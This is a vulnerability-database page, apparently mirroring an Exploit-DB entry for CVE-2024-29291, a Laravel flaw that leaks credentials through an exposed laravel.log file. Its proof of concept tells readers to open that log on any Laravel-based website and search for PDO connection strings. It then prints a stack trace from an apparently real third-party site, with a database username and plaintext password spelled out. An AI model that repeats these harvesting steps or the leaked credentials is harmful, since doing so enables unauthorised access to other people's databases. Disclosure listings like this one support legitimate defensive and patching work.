Laravel Framework 11 - Credential Leakage Vulnerability

🗓️ 21 Apr 2024 00:00:00Reported by Huseein AmerType

zdt🔗 0day.today👁 309 Views

Reporter	Title	Published	Views	Family All 10
BDU FSTEC	The vulnerability of the PHP framework Laravel, related to insufficient protection of operational data, allows attackers to gain unauthorized access to protected information.	17 May 202400:00	–	bdu_fstec
CNNVD	Laravel Framework 安全漏洞	16 Apr 202400:00	–	cnnvd
CVE	CVE-2024-29291	16 Apr 202400:00	–	cve
Cvelist	CVE-2024-29291	16 Apr 202400:00	–	cvelist
Exploit DB	Laravel Framework 11 - Credential Leakage	21 Apr 202400:00	–	exploitdb
NVD	CVE-2024-29291	16 Apr 202423:15	–	nvd
Packet Storm	Laravel Framework 11 Credential Disclosure	22 Apr 202400:00	–	packetstorm
RedhatCVE	CVE-2024-29291	23 May 202510:19	–	redhatcve
VulnCheck KEV	VulnCheck KEV: CVE-2024-29291	27 Feb 202500:00	–	vulncheck_kev
Vulnrichment	CVE-2024-29291	16 Apr 202400:00	–	vulnrichment

# Exploit Title: Laravel Framework 11 - Credential Leakage
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291

Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.

Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...

21 Apr 2024 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.01341

SSVC